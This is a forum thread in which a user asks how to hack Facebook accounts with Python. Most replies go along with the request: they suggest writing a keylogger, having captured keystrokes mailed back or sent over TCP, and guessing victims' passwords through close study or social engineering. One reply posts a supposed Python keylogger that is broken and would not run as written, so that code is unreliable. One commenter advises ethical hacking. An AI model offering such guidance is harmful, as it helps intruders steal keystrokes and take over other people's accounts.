- 1

Can i hack facebook accounts from python?No offence please.

just for information

20th Jul 2017, 1:53 PM
Vivas Khadgi
Vivas Khadgi - avatar
69 Réponses
+ 6
that's what we call social engineering, ok Vivas, my opinion is this, you should not learn python for hacking, follow paths of an ethical hacker if you want to do hacking things, it's fun but not easy, learn these programming languages just to serve the world not to hurt anyone.
20th Jul 2017, 3:40 PM
Nushan Kodikara
Nushan Kodikara - avatar
+ 6
#To end all this, here is a keylogger written in python import msvcrt if msvcrt.kbhit() == True: file = fopen("C:\\sys\\data.txt", "a") key = str(msvcrt.getch()) file.write(key) #Happy Hacking
20th Jul 2017, 4:01 PM
LordGhostX
LordGhostX - avatar
+ 6
I’m offended
8th Nov 2020, 2:26 PM
Galaxy-Coding (inactive)
Galaxy-Coding (inactive) - avatar
+ 3
Just create a keylogger script with python
20th Jul 2017, 2:32 PM
LordGhostX
LordGhostX - avatar
+ 3
that's not social hacking it's social engineering
20th Jul 2017, 3:24 PM
Nushan Kodikara
Nushan Kodikara - avatar
+ 2
if you're tricky enough, I did once, but you need a level of infinity so, if you're a beginner, just give up or waste some valuable time on reading about CGIs, you'll come up with just what I did
20th Jul 2017, 1:56 PM
Nushan Kodikara
Nushan Kodikara - avatar
+ 2
that's great too
20th Jul 2017, 2:33 PM
Nushan Kodikara
Nushan Kodikara - avatar
+ 2
Thanks
20th Jul 2017, 4:13 PM
Vivas Khadgi
Vivas Khadgi - avatar
+ 1
You can send it via mail and the key dumps will also be mailed to you
20th Jul 2017, 2:42 PM
LordGhostX
LordGhostX - avatar
+ 1
Thanks!!! All of you For your advise.
20th Jul 2017, 2:48 PM
Vivas Khadgi
Vivas Khadgi - avatar
+ 1
but TCP protocols are easier and safer than a regular email
20th Jul 2017, 2:48 PM
Nushan Kodikara
Nushan Kodikara - avatar
+ 1
why not python lol
20th Jul 2017, 3:53 PM
clement
clement - avatar
0
Short answer: You can Long answer: The best way, imo, to hack a facebook account via social hacking. I would go into it but it's entirely different topic from programming.
20th Jul 2017, 3:23 PM
Matthew Wong
Matthew Wong - avatar
0
Depends. When I say social hacking, I meant by studying someone so closely that you can guess their password without socially engineering a bunch of ruse to gain trust like a long con.
20th Jul 2017, 3:30 PM
Matthew Wong
Matthew Wong - avatar